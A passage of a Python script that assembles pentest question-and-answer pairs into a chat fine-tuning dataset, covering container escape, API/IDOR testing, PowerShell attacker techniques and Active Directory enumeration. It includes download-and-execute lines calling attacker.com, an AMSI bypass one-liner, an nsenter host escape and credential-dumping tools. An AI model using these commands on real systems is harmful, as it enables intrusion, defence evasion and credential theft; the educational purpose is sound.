  "Executive summary: 1-2 page section for C-suite and board; non-technical; conveys risk and business impact without technical jargon. Key elements: (1) Engagement overview: who engaged who; when testing occurred; what was tested (external perimeter, internal network, web applications); testing type (black/grey box). (2) Overall risk rating: single colour-coded risk level (Critical/High/Medium/Low) for entire assessment; methodology for determining (based on highest-severity finding? Weighted average?). (3) Summary of findings: number of vulnerabilities by severity (3 Critical, 7 High, 15 Medium, 8 Low, 4 Informational); avoid technical names at this level; use business language. (4) Key findings narrative: 2-3 most critical findings in business language: An unauthenticated attacker with network access could compromise all user accounts and access confidential customer data rather than SMB relay attack exploiting lack of signing allows NTLM credential forwarding. (5) Risk context: how do findings compare to industry? What is likelihood of exploitation? What is business impact (data breach, operational disruption, regulatory penalty, reputational damage)? (6) Attack narrative: brief story of how a real attacker would progress (obtained foothold via phishing email, moved laterally through network, reached financial systems within 4 hours). (7) Remediation priorities: top 3-5 actions with highest risk reduction; business-language recommendations; timeline urgency. (8) Positive findings: what security controls worked well? Demonstrates balanced assessment not just negative findings; builds trust. Common mistakes: too technical (include CVE numbers in exec summary); too long (no one reads 10-page exec summary); no business impact (CVE score without explaining what attacker could do with it); blame language (avoid implying negligence); missing remediation priorities (executive needs to know what to prioritise budget for).")

p("How do you perform container security testing?",
  "Container security testing methodology: Image security: pull target image; scan with Trivy: trivy image TARGET_IMAGE (report CVEs in base image and packages); inspect Dockerfile if available for security anti-patterns. Dockerfile analysis: USER root (should use non-root user); ADD http:// (fetches from HTTP not HTTPS); COPY secrets.env . (credentials in image layers); no HEALTHCHECK; no specific tag (using :latest = unpredictable); RUN apt-get without --no-install-recommends (bloated attack surface). Layer inspection: dive (container layer explorer) -- inspect each layer for accidentally included secrets or credentials; docker history IMAGE --no-trunc (view commands per layer). Running container testing: docker exec -it CONTAINER_ID bash (interactive shell in container); check running processes, network connections, file permissions; whoami (should not be root -- check for privilege escalation). Network: docker network inspect NETWORK (container IP assignments, exposed ports); nmap against container IPs from same network; check if containers unnecessarily can reach internet (no egress filtering). Secrets in running container: printenv (environment variables -- credentials?); cat /proc/1/environ (process 0 environment); check mounted files: ls /run/secrets/, ls /vault/secrets. Docker API exposure: curl http://localhost:2375/containers/json (if Docker API exposed without auth = full container control); scan for exposed port 2375/2376. Kubernetes specific: kubectl auth can-i --list (what permissions does current service account have); check service account token: cat /var/run/secrets/kubernetes.io/serviceaccount/token; decode JWT (permissions visible in payload); test API server with token: curl -k https://kubernetes.default/api/v1/pods --header Authorization: Bearer $TOKEN. Container escape: check for privileged flag: cat /proc/self/status | grep CapEff (all caps = privileged); fdisk -l (visible disks = privileged container, can mount host filesystem). nsenter in privileged: nsenter --target 1 --mount --uts --ipc --net --pid -- chroot /host /bin/bash = full host escape from privileged container.")

p("What security testing should be done on APIs before release?",
  "API pre-release security testing checklist: Authentication: all endpoints require authentication (test without token); tokens expire after reasonable time; refresh tokens revoked on logout; JWT signature validated (all algorithms); token transmitted securely (HTTPS only, not in query string). Authorization: test all endpoints with different user roles; low-privilege user cannot access high-privilege endpoints; resource-level auth (user can only access own resources -- IDOR testing); admin endpoints require admin role (not just any authenticated user). Input validation: fuzz all parameters (SQLi, command injection, SSTI, XSS payloads); integer overflow (send max int values); negative numbers for quantities; null values; empty strings; very long strings (buffer overflow potential); special characters; JSON injection in nested objects; XML payloads if XML accepted. Business logic: sequence attacks (skip steps in multi-step process); price manipulation (change price in request body); quantity manipulation (negative quantity = refund?); race conditions (submit payment twice simultaneously); state manipulation (revert cancelled order?). Rate limiting: brute force login endpoint (100 requests, no lockout?); API key enumeration (rapid requests from different IPs); password reset code brute force. Error handling: trigger errors; check if stack traces exposed; database error messages visible; internal path disclosure in errors. Data exposure: response contains only necessary fields (not entire database row); PII properly masked or excluded; sensitive data in response headers (debug headers). Security headers: HTTPS enforced; HSTS header; CSP if API returns HTML; no Cache-Control: no-store for sensitive endpoints; no debug headers in production. API versioning: older version tested with same security controls; deprecated endpoints removed or protected. Dependency scanning: SCA on API codebase dependencies before release. Documentation: does API documentation expose sensitive endpoint or parameter details that should be internal?")

p("What is Insecure Direct Object Reference (IDOR) at the API level?",
  "API-level IDOR: object identifiers in API requests reference data the authenticated user should not access. Common patterns: numeric sequential IDs: GET /api/orders/12345 -- attacker changes to /api/orders/12346 (another user's order); UUID IDs: not guessable but may be leaked via search, linked documents, error messages; encode: base64 or hash IDs not truly protecting -- decode and enumerate. Test methodology: create two test accounts (User A and User B); log all requests as User A accessing User A resources; collect all resource identifiers (order IDs, document IDs, account IDs, message IDs); replay each request authenticated as User B with User A's IDs; check for data returned that belongs to User A. HTTP methods: GET IDOR (read other user data); PUT/PATCH IDOR (modify other user data); DELETE IDOR (delete other user data); POST IDOR (perform action on other user's behalf). Object types: user profile (/api/users/123); orders (/api/orders/456); messages (/api/messages/789); files (/api/files/document.pdf); invoices (/api/invoices/INV-001). Indirect IDOR: IDOR via POST body parameter (not URL): {user_id: 123, action: delete_account}; change user_id to other account; account deleted. API aggregation: /api/reports?user_ids=123,456,789 -- user can aggregate data for multiple user IDs; can include IDs belonging to other users. Chained IDOR: first request reveals another user's order ID via indirect disclosure; second request uses that ID for direct IDOR. Privilege IDOR: change account_type or role parameter for own account; vertical privilege escalation via IDOR on own user object. IDOR in response: GET /api/profile returns current user profile; what if POST /api/profile updates profile and returns updated data -- does update affect only own profile? Detection: Autorize (Burp extension): replays every request with another user's token; highlights responses that differ (indicating possible IDOR success).")

p("How do attackers use living-off-the-land techniques in PowerShell?",
  "PowerShell LOLbas techniques: PowerShell is built-in and often trusted; powerful scripting with .NET access; commonly abused by attackers. Execution bypasses: powershell -ExecutionPolicy Bypass -File script.ps1 (bypass execution policy -- does not require admin); powershell -ExecutionPolicy Unrestricted -Command ... (inline command without file); powershell -NonInteractive -WindowStyle Hidden -Command ... (hide window); powershell -EncodedCommand BASE64 (encode command to avoid command-line monitoring). Download and execute (common initial access chain): IEX(New-Object Net.WebClient).DownloadString(http://attacker.com/payload.ps1) -- download and execute in memory; or: IEX((Invoke-WebRequest http://attacker.com/p.ps1).Content); or: (Invoke-RestMethod http://attacker.com/p.ps1) | IEX; all download PowerShell code to memory without touching disk. Credential access: Invoke-Mimikatz (PowerSploit module): runs Mimikatz in-memory via reflection; Get-NetUser / Get-ADUser: enumerate AD users; Get-WmiObject Win32_UserAccount (local users). Recon: Get-ADComputer -Filter * (all AD computers); Test-NetConnection -ComputerName DC01 -Port 445 (port check without nmap); Get-NetTCPConnection (active connections, replacement for netstat). Post-exploitation tools: PowerView (AD enumeration: Get-DomainUser, Get-DomainGroup, Find-LocalAdminAccess); Invoke-Kerberoast (PowerSploit Kerberoasting); PowerShell Empire (older framework). AMSI bypass: [Ref].Assembly.GetType(System.Management.Automation.AmsiUtils).GetField(amsiInitFailed,NonPublic,Static).SetValue($null,$true) (set AMSI initialisation failed flag -- disables AMSI for current session); various obfuscation-based bypasses. Script Block Logging bypass: obfuscate code so AMSI/SBL does not recognise patterns; split strings: IE(&X); base64 decode at runtime; Invoke-Obfuscation tool. Detection: PowerShell Script Block Logging (Event 4104): logs all PowerShell code executed (even if obfuscated, final deobfuscated block logged in some cases); PowerShell Module Logging (Event 4103); Constrained Language Mode (CLM) restricts PowerShell capabilities; anti-malware scan interface (AMSI) -- script content scanned before execution; Defender ATP/Sentinel detects common PS malware patterns.")

p("What is an assumption of breach and why is it important?",
  "Assume Breach mindset: security strategy assuming attackers have already or inevitably will gain initial access to your environment; shifts focus from perimeter defence to detection, containment, and response. Why important: perimeter-only security (trust inside, block outside) fails against: phishing (user on trusted network downloads malware); insider threats; supply chain attacks (trusted software delivers malware); compromised third-party with access; VPN credential theft. If only protecting perimeter: once attacker is inside, they have free rein; lateral movement undetected; weeks to months dwell time before detection. Assume Breach principles: Zero Trust Architecture: every access request verified regardless of network location; no implicit trust based on being inside corporate network; MFA, continuous verification, least privilege everywhere. Detection over prevention-only: invest in detection capabilities (SIEM, EDR, NDR, honeypots); attackers will get in; how quickly do you detect them? Dwell time metric (time from compromise to detection): industry average 21 days (CrowdStrike 2024); reduce to hours or days. Segmentation: if attacker has one compromised host, limit what they can reach; network segmentation; identity segmentation (no lateral movement with same credentials); crown jewel isolation. Incident response readiness: practise with tabletop exercises and red team exercises; clear playbooks; RACI for incidents; external IR retainer (Mandiant, CrowdStrike Services, IBM X-Force). Assume Breach testing: purple team with Assume Breach scenario: attacker starts with compromised workstation; measure Blue Team detection; lateral movement testing. Business value: assume breach -> find gaps in detection and response -> fix gaps before real attacker finds them; more realistic than assuming perimeter is sufficient; board-level security posture discussion around Assume Breach resonates with executives who have seen news of major breaches despite good perimeter defences.")

p("How do you document findings in a penetration test using CVSS?",
  "CVSS (Common Vulnerability Scoring System): standardised framework for rating vulnerability severity. CVSS 3.1 base score components: Attack Vector (AV): Network (N) -- remotely exploitable; Adjacent (A) -- same network segment; Local (L) -- local access needed; Physical (P) -- physical access. Attack Complexity (AC): Low (L) -- reproducible every time; High (H) -- specific conditions required. Privileges Required (PR): None (N); Low (L) -- regular user; High (H) -- admin. User Interaction (UI): None (N); Required (R) -- victim must take action. Scope (S): Unchanged (U) -- same security scope; Changed (C) -- impacts other components. Confidentiality, Integrity, Availability Impact: None (N); Low (L); High (H). Example: Apache Log4Shell CVE-2021-44228 CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical; Network exploitable, low complexity, no privileges, no user interaction, scope changed, all three impacts high. Score ranges: Critical 9.0-10.0; High 7.0-8.9; Medium 4.0-6.9; Low 0.1-3.9; None 0. Temporal metrics: Exploitability (E): unproven, proof-of-concept, functional exploit, high; Remediation Level (RL): unavailable, workaround, temporary fix, official fix; Report Confidence (RC): unknown, reasonable, confirmed; reduce base score when no public exploit exists. Environmental metrics: account for organisation-specific context; if confidentiality impact doesn't matter (public data only) -- lower score for that organisation; if asset in DMZ with compensating controls -- lower effective score. In penetration test reporting: include CVSS vector string and score with each finding; explain which CVSS factors apply to this specific vulnerability and why; include temporal score if exploit is published; explain if environmental factors reduce risk for client; help client prioritise remediation by CVSS score + asset criticality + business impact.")

p("What is the difference between a vulnerability scan and a penetration test?",
  "Vulnerability scan vs penetration test: Vulnerability scan: automated tool (Nessus, Qualys, Rapid7, OpenVAS) runs against target; identifies known vulnerabilities by testing indicators (service banners, version numbers, configuration checks, authenticated patch level); generates list of potential vulnerabilities; does NOT exploit them; produces many findings including false positives; fast (hours); relatively cheap; repeatable; conducted frequently (weekly/monthly). Penetration test: human-led engagement simulating real attacker; manually validates vulnerabilities by exploiting them; chains vulnerabilities for higher impact; discovers business logic flaws and vulnerabilities scanners miss; produces validated, proven findings; few or no false positives (only confirmed exploitable issues); slow (days to weeks); expensive ($10,000-$100,000+); conducted infrequently (annually, quarterly); provides business impact context. When scan finds: Open port 445 with outdated SMB version -- potential MS17-010; pentest confirms: exploited MS17-010 to achieve domain admin on Server 2019 within 2 hours. When pentest finds what scan misses: business logic flaw (order price manipulation -- scan cannot understand business logic); chained vulnerabilities (low + medium + info = critical attack path -- scan rates each independently); authentication bypass via race condition; complex access control issues; social engineering vector. Which to use: both; scan for breadth and frequency (cheap, fast, finds known issues); pentest for depth and real-world attack simulation (finds complex issues, validates scan findings, provides attack narrative). Compliance: PCI DSS 11.3 requires vulnerability scanning (quarterly) AND penetration testing (annually); different requirements met by different activities. Bug bounty: combines elements of both -- human testers with continuous scope.")

p("How do you enumerate Active Directory without admin privileges?",
  "Active Directory enumeration from low-privilege domain user: any domain user can query most AD information by default. Built-in Windows commands: net user /domain (list all domain users); net group /domain (list all domain groups); net group Domain Admins /domain (members of Domain Admins); net group Enterprise Admins /domain; whoami /groups (current user's group memberships); systeminfo (OS version, patch level, domain); nltest /dclist:DOMAIN (list domain controllers). PowerShell: Get-ADUser -Filter * -Properties * (all users with all properties -- requires AD module or RSAT); Get-ADGroup -Filter * (all groups); Get-ADGroupMember Domain Admins (DA members); Get-ADComputer -Filter * (all computers); [adsisearcher]searcher=New-Object DirectoryServices.DirectorySearcher; searcher.SearchRoot=New-Object DirectoryServices.DirectoryEntry; searcher.Filter=(objectCategory=computer); searcher.FindAll() (ADSI search without AD module). PowerView (no admin needed for most functions): Get-NetDomain (domain info); Get-NetDomainController (domain controllers); Get-DomainUser (all users with properties); Get-DomainGroup (groups); Get-DomainGroupMember Domain Admins (DA members); Get-DomainComputer (all computers); Find-DomainShare (enumerate all accessible shares); Get-DomainGPO (Group Policy Objects); Get-DomainTrust (trust relationships between domains); Invoke-ACLScanner (ACL misconfigurations). BloodHound collection: SharpHound.exe --CollectionMethod All (runs as regular user; collects all above data plus session data and ACLs; uploads to BloodHound). LDAP queries: ldapsearch -H ldap://DC01 -x -b DC=corp,DC=com (anonymous if anonymous bind allowed); with creds: ldapsearch -H ldap://DC01 -D user@corp.com -w password -b DC=corp,DC=com (objectClass=user). Interesting attributes: servicePrincipalName (SPNs for Kerberoasting); logonCount=0 (service accounts that never logged in -- no password change); badPwdCount; adminCount=1 (protected objects). SMB enumeration: smbmap -H DC01 -u user -p pass (list shares and permissions); crackmapexec smb 10.0.0.0/24 -u user -p pass --shares (network-wide share enumeration).")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f TARGET MET -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
